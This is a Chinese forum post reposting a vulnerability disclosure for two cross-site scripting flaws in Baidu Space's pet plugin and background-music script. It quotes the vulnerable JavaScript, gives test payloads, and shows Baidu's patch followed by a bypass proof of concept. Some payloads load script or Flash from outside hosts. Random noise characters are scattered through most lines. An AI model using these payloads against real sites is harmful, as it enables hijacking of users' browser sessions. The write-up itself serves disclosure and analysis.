百度空间的宠物插件对用户输入变量未经任何过滤便存储,并不经过滤输出,造成XSS.
- U ?! @& u' j4 i, ~6 @8 j8 Y5 d: ^5 G' A" e8 Q7 G6 S
1.在http://hi.baidu.com/p__z/modify/sppet中,用户可以输入留言管理,提交后,未过滤直接储存.
0 n1 r! v/ T! X7 }2.在http://hi.baidu.com/ui/scripts/pet/pet.js中 / r R* p9 E# q) w# K+ N& l
4 B7 J5 O. q& B
将输出一段HTML:<p style="margin-top:5px"><strong>’+F[2]+"说:</strong>"+BdUtil.insertWBR(F[0], 4)+’</p>
* b: I9 P+ c0 t. F$ Y& i9 {- b9 Y8 K其中BdUtil.insertWBR为 " c: {# `5 o; C, G) t) l
function(text, step) { + c5 ^" @ [. f$ P, g8 M3 f( P/ I
var textarea = textAreaCache || getContainer(); ' h3 e# [9 s$ E ]. s
if (!textarea) { / ]. G& w* q# g" X% }2 { g
return text; " Y) G8 R* \ t4 n3 x3 M
}
z; C( A' A; B! z4 n textarea.innerHTML = text.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">"); 6 ]: p. ?3 @+ L1 u# \
var string = textarea.value; 6 l5 u: ~ B( T7 q" i
var step = step || 5, reg = new RegExp("(\\S{" + step + "})", "gi");
5 c) [ j- H+ |- l$ } var result = string.replace(/(<[^>]+>)/gi, "$1<wbr/>").replace(/(>|^)([^<]+)(<|$)/gi, function (a, b, c, d) {if (c.length < step) {return a;}return b + c.replace(reg, "$1<wbr/>") + d;}).replace(/&([^;]*)(<wbr\/?>)([^;]*);/g, "&$1$3;"); ) A( a% A# b% \5 r5 t
return result;
' T5 _7 e' Z3 H1 r: D/ A/ T} ; x( k" G+ I+ }+ W
在首页中,textAreaCache 和 getContainer()均不存在,故!textarea为true,未经过滤直接return text.造成XSS. ; \* v- {+ u4 {/ Z
测试代码:宠物留言管理处输入:<img src=# onerror=alert(/qing/)>
G" L) D8 X: P + A3 N7 I* b" |5 J
二:creatbgmusic() Dom-Xss Bug t+ P7 g9 X& u# K
百度空间的Javascript Dom函数creatbgmusic()在输出变量bgmusic*没有进行过滤,导致可以通过initBlogTextForFCK()函数构造容易HTML代码,最终导致xss漏洞
! Z; S& ~+ I9 h$ Y( ^0 c/ a/ q3 K, r& C
在http://hi.baidu.com//js/bgmusic.js?v=1.0.js 代码: . a* r; ]( E. Y/ C; W9 |
( a/ w! H3 i2 `' C- `function creatbgmusic(murl, musicnum, IsMusicHide, IsMusicLoop, IsMusicAutoPlay, unknow, functype) { ; Q/ a* K% l1 r2 u( B/ T) r( m: J. H
//传入的murl赋值到bgmusic1和bgmusic2中 . R: T: J2 ` t4 ]* y8 v
//可以通过构造类似代码来闭合标签如 "><img src=2 onerror=s=document.createElement("script");s.src="http://www.80vul.com/sobb/alert.php";document.body.appendChild(s);>#1
2 S; |5 r" q ~, H; \) h1 `5 B var bgmusic1 = "<OBJECT id=phx width=100% classid=clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6 " + (IsMusicHide ? "height=45" : "") + ">" + "<PARAM NAME=\"URL\" VALUE=\"" + murl + "?t=" + Math.random() + "\">" + " <PARAM NAME=\"rate\" VALUE=\"1\">" + " <PARAM NAME=\"balance\" VALUE=\"0\">" + " <PARAM NAME=\"currentPosition\" VALUE=\"0\">" + " <PARAM NAME=\"defaultFrame\" VALUE=\"\">" + " <PARAM NAME=\"PlayCount\" VALUE=\"" + (IsMusicLoop ? 100 : 0) + "\">" + " <PARAM NAME=\"DisplayMode\" VALUE=\"0\">" + " <PARAM NAME=\"PreviewMode\" VALUE=\"0\">" + " <PARAM NAME=\"DisplayForeColor\" VALUE=\"16777215\">" + " <PARAM NAME=\"ShowCaptioning\" VALUE=\"0\">" + " <PARAM NAME=\"ShowControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowAudioControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowDisplay\" VALUE=\"0\">" + " <PARAM NAME=\"ShowGotoBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowStatusBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowTracker\" VALUE=\"1\">" + " <PARAM NAME=\"autoStart\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"AutoRewind\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"currentMarker\" VALUE=\"0\">" + " <PARAM NAME=\"invokeURLs\" VALUE=\"0\">" + " <PARAM NAME=\"baseURL\" VALUE=\"\">" + " <PARAM NAME=\"volume\" VALUE=\"100\">" + " <PARAM NAME=\"mute\" VALUE=\"0\">" + " <PARAM NAME=\"stretchToFit\" VALUE=\"0\">" + " <PARAM NAME=\"windowlessVideo\" VALUE=\"1\">" + " <PARAM NAME=\"enabled\" VALUE=\"1\">" + " <PARAM NAME=\"EnableFullScreenControls\" VALUE=\"0\">" + " <PARAM NAME=\"EnableTracker\" VALUE=\"1\">" + " <PARAM NAME=\"EnablePositionControls\" VALUE=\"1\">" + " <PARAM NAME=\"enableContextMenu\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionStart\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionEnd\" VALUE=\"0\">" + " <PARAM NAME=\"fullScreen\" VALUE=\"0\">" + " <PARAM NAME=\"SAMIStyle\" VALUE=\"\">" + " <PARAM NAME=\"SAMILang\" VALUE=\"\">" + " <PARAM NAME=\"SAMIFilename\" VALUE=\"\">" + " <PARAM NAME=\"captioningID\" VALUE=\"\">" + " <PARAM NAME=\"Visualizations\" VALUE=\"1\">";
: {! M, u7 o& z6 N: b: _ if (musicnum <= 1) {
- E3 y$ C" V" }- Q0 K4 F bgmusic1 += " <PARAM NAME=\"uiMode\" VALUE=\"mini\">"; & h' ^& [) W, J+ q# S* O
}
& d9 a. _( I' A9 ]! `2 N, K2 @ bgmusic1 += "</OBJECT>";
, h* W' J% n8 X var bgmusic2 = "<EMBED src=\"" + murl + "?t=" + Math.random() + "\" width=\"100%\" " + (IsMusicHide ? "height=45" : "") + " type=\"application/x-mplayer2\" invokeurls=\"0\" autogotourl=\"false\" autostart=" + (IsMusicAutoPlay ? 1 : 0) + " loop=" + (IsMusicLoop ? 1 : 0) + " quality=\"high\"";
/ W2 P; V8 J: l, ?7 z8 \) j8 S if (musicnum <= 1) { 6 C4 v; P9 J1 u- M* V
bgmusic2 += "showcontrols=\"1\" showpositioncontrols=\"0\" ";
* C4 S: u( G3 @2 p3 I# ?; r' u }
5 n8 e8 `& C8 r2 o& Y8 k$ @ bgmusic2 += "> </EMBED>";
3 h; }. t: A$ v7 q+ ]% f. k" c6 _3 V var bgmusic3 = "<div id=\"m_bgmusic\" class=\"modbox\">\u5BF9\u4E0D\u8D77\uFF0C\u60A8\u5C1A\u672A\u5B89\u88C5windows media player\uFF0C\u65E0\u6CD5\u6B23\u8D4F\u8BE5\u7A7A\u95F4\u7684\u80CC\u666F\u97F3\u4E50\uFF0C\u8BF7\u5148<a href=\"http://www.baidu.com/s?wd=windows+media+player+%CF%C2%D4%D8&cl=3\" target=\"_blank\">\u4E0B\u8F7D\u5E76\u5B89\u88C5</a><br><br></div>";
r7 ^# q* S3 X' u: N$ B% M var bgmus = detectWMP();
! j8 g* Y, f# [0 D if (functype == "FckMusicHelper") { 7 E& V9 I' S, G0 b, Q3 r
if (bgmus.installed) { 7 P; e: A# F& E% E2 V8 H- R% s
if (bgmus.type == "IE") { " f# j4 R7 h) c. \( o. v4 I. V* C$ K
return bgmusic1; ) I( v8 E! e& ?/ c+ b
} else if (bgmus.type == "NS") { $ _; r) v y! @, r( D4 y
return bgmusic2;
5 L4 t3 O0 g+ W } 1 |; c3 r3 r6 z6 \8 C
} else { 6 W f: W2 f/ F- b5 h9 @
return bgmusic3; + F! f! ]2 U7 \: d
}
+ T) A9 \# C8 A$ ~$ N" Q) i } else { 7 C I. {1 B' i+ u! h
if (bgmus.installed) { 2 f6 }$ Z+ S( w i! X% h
//document.write 直接输出bgmusic变量 导致xss
' ^( B' Q( R8 {/ Y; \ if (bgmus.type == "IE") {
: U! Z0 g( H1 ?1 f1 _" Y3 ~ document.write(bgmusic1); 5 Z' q2 ^' o# U4 ?5 L- m; u; I
} else if (bgmus.type == "NS") {
! |& F3 P: D {2 ^6 _3 M$ b document.write(bgmusic2); , n4 L6 b$ b' d
} 1 }- x8 g* d- {( D
} else { ! @3 ?% D N/ Q4 ]/ P
document.write(bgmusic3); $ N2 s) @8 x6 `# Z
} 3 A& u! R j: r0 R' f
return "";
3 U* `9 [) l s0 P. P, T/ ` } 2 i* [) T& c% j! G7 }9 v0 S+ v
} * n8 `. |. F2 W- D6 A
4 `2 Z1 w$ P1 X- y; V
在看百度空间里的initBlogTextForFCK()函数,调用了creatbgmusic() ,代码如下: 3 ?1 T( D b3 m" `1 w" R K' n
; P0 z+ B) j t+ ]$ V$ o
function initBlogTextForFCK(){ 1 \" n; M+ E, g, {* o* q
//fck init music
* Y' d( x0 _/ p8 sif(window.Node){Node.prototype.replaceNode=function(Node){this.parentNode.replaceChild(Node,this);}} & |( V. \( C) v) S
var imgBox=document.getElementsByName(’musicName’); //取得了文章中的所有name="musicName"的标签数组
0 d& K8 o4 U' p5 z; d& Dvar isAutoPlay=true; % I* K7 f3 q' e/ u/ |8 e
for(var i=0,n=imgBox.length;i<n;i++){ //然后遍历. 3 B( M4 {5 u: B# @, Q. \6 ]
var img=imgBox; ( f8 n* s& H. b3 V6 b
if(img.getAttribute(’rel’)){ ' _: b5 q. h) M0 N# s+ Z+ v& ?9 K
var musicSrc=img.getAttribute(’rel’); //取得标签中rel的值,赋值给musicSrc 1 _5 g/ a" R5 h- n
var musicDiv = document.createElement("SPAN"); ( i4 c7 f8 f/ L. j# J7 N
var tmp=musicSrc.substr (musicSrc.indexOf(’#’)+1, 1); //以"#"为界分割musicSrc字符串,提取自动播放的flag[tmp]
, [! `# ]1 h, d0 n
$ L: k5 S+ _$ R( ]' T4 C F .......................... + R1 b/ w7 e9 D; M+ k, |
8 X, x u# W; b! X; K2 ]# \
//直接将部分musicSrc传入creatbgmusic函数.在creatbgmusic函数直接把传入的murl赋值到bgmusic1和bgmusic2中并document.write出来.
% |& _0 y0 g: ]) S var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’); 8 c# _( p+ K; c1 G A( f
shtml=shtml.replace(’width=100%’,’width=200’).replace(’width="100%"’,’width=200 height=45’); img.replaceNode(musicDiv); ( S3 V; ?! s4 |; i7 c; D& X {2 z
musicDiv.innerHTML=shtml;
}. J8 \9 b( p3 Z% `" J i--;n--;
$ o' ^( H% H8 ]7 d0 g( w }
3 r9 R' a/ f3 g} % X/ F' w" t: F' r i! p z
0 S; ^, e+ p9 g) g从上面的代码分析可以看出:在所有的参数传递中,我们没有看到过滤.百度空间的富文本编辑器的过滤模式是基于HTML语法的,不会过滤掉一个属性的值中的HTML标签.所以我们可以精心构造一个的恶意的标签,在JS进行DOM操作后引起XSS. " P4 u! V" d. f8 [
' M) `2 Z* K$ N/ p, G! b
测试方法:<img width="200" height="45" name="musicName" rel=’"><img src=2 onerror=alert(/qing/)>#1’ src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif"/> m8 ]. n4 J4 j; Y( |% B8 |
, T$ x! o; b% x/ K等待官方补丁
" v+ m D: z2 Z8 ^
* ]! U( S* `# @$ X0 |; I% M3 \9 Wupdate 2010年5月13日 4 ?- D+ p# i6 C- C! y+ h
( [9 Y" \3 v4 j官方补丁:
- w: g6 n0 {' L. c( E, x# k O. D, X3 A$ N
var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’); - C5 d" G$ A9 l. W. w
改为:
6 u7 {) R7 d2 x* Jvar shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)).replace(/[\s><()]+/g,’’),1,true,false,isAutoPlay,isAutoPlay,’FckMusicHelper’);
6 ?, x( y2 }( L( O v( M9 H5 d
. n) a7 ?8 Q, o5 c' W: P; B* B, Yupdate 2010年5月13日 21:50:37
7 A P; h/ d4 _' }# e9 A1 ^ w
! E5 m) a$ @0 D E- l# i7 h补丁存在漏洞 没有过滤" 可以继续跨: # P" m O! n2 s: Y3 W
& j/ g% M4 g( B% Z! P# ]
NEW POC: : J+ L9 i4 K5 Z I& i
! d- v$ L" ~: r8 ^' s+ ~2 v. }
<img width="200" height="45" _fcksavedurl=" http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" rel=’http://www.xsser.net/pz/js.swf" , X, D0 _4 O' h) v$ d$ U
- \4 @. H- }/ e( X+ J
allowscriptaccess="always" type="application/x-shockwave-flash"#2’ name="musicName"/>
( I/ `3 q# K# J # e4 q( c; |" r; \4 f9 Z# S! a
|
发表于 2013-8-24 11:51:11
收藏
支持
反对